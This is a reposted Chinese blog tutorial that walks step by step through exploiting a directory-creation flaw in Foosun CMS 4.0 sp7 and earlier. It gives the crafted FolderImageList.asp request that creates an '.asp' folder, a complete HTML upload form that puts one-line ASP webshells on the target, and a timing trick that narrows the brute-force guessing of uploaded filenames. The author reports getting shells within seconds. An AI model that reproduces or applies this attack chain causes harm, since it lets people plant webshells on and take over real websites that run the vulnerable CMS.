foosun cms(风讯内容管理系统)建目录漏洞实践总结(图文详解)

1.版本:应该是 4.0 sp7以下的吧(应该算不上0day漏洞了).(网上资料说的,5.0版本的我没测试),我主要用图片详细解释漏洞利用过程.

2.过程:

   a)看版本,访问网站跟admin目录,看登陆的logo (foosuncms),提示版本.

    b)注册, 访问/User/Reg_service.asp,记录这个id,如下图:

clip_image002

    c)增加.asp目录,如:aaa.asp,那么访问:/User/CommPages/FolderImageList.asp?f_UserNumber=091310I59B3&Type=AddFolder&Path=/userfiles/091310I59B3/aaa.asp//&CurrPath=/userfiles/091310I59B3

(记得将091310I59B3替换为你的注册后的编号).访问后应该看到如下的目录(否则就是不支持.asp目录了或者最新修复了漏洞的版本,后续没得搞了,不用看了,就此打住吧):

clip_image004

3.传一句话到aaa.asp目录,这儿我自己根据抓包编写了一个html,关键解决图片上传后文件名猜解问题(记得替换下面html里面得id与网址):

<form name=from1 method="post" enctype="multipart/form-data" target="new1" action="http://www.xxx.cn/User/Commpages/UpFileSave.asp">
数量<input name=FilesNum value=1>
<input type=file name="File1"><br>
<input name="Path" value=/UserFiles/091310I59B3/abcdefg><br>
命名方式<input name="AutoReName" value=2>
<input type=submit name="Submit" value=Submit onsubmit=’alert(1)’>
</form>
<br><br>
<form name=from2 method="post" enctype="multipart/form-data" target="new2" action="http://www.xxx.cn/User/Commpages/UpFileSave.asp">
数量<input name=FilesNum value=10>
<input type=file name="File1"><br>
<input type=file name="File2"><br>
<input type=file name="File3"><br>
<input type=file name="File4"><br>
<input type=file name="File5"><br>
<input type=file name="File6"><br>
<input type=file name="File7"><br>
<input type=file name="File8"><br>
<input type=file name="File9"><br>
<input type=file name="File10"><br>
<input name="Path" value=/UserFiles/091310I59B3/aaa.asp><br>
命名方式<input name="AutoReName" value=2>
<input type=submit name="Submit" value=Submit>
</form>
<br><br>

4.猜解上传到aaa.asp目录得文件名,这儿注意观察文件名文规则与文件夹时间:

clip_image006

从上图看出:刚提交上去得一句话文件夹保存时间为:2010-7-9 15:08:38,那么文件名(假设是gif文件) 应该是:

2010_07_09_15_08_38xxxxx.gif,看出来了吧,最后38是秒数,那么现在不确定的是最后5位数字.

5.解决猜解概率问题:虽然5位数字最多99999次,(10万次呀),不多也不少,下面结合上面自己编的html说明一下如何增加命中率:

clip_image008

    1)第一次传一个到正常目录(如abcdefg目录),点了按钮之后,马上点下面的表单按钮(aaa.asp目录)[要非常快,可以先点开两个窗口,不关闭,再第二次来点,就不会打开新窗口了,更快].

    2)那么现在可以确定起始时间:abcdefg这个目录里面的可以看到,而传到aaa.asp目录的,提交在后,时间肯定更靠后,那就将xxxxx在abcdefg目录刚传的图片上面加吧.另外,因为一次传了10个(都是一样的一句话),那么命中概率又大了很多呀,按上述方法,我将10万变成了3万(见下图).

6.暴力猜解路径,自己写个工具,或者拿那种扫后台的软件都可以,自己做一个字典(做字典也简单,用excel+编辑器搞定)就是了:

clip_image010

好吧,就到这儿,我没几十秒就猜到了3个:

clip_image012

from:http://hi.baidu.com/it_security/blog/item/daf9a423354970fed6cae265.html

发表评论

电子邮件地址不会被公开。

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>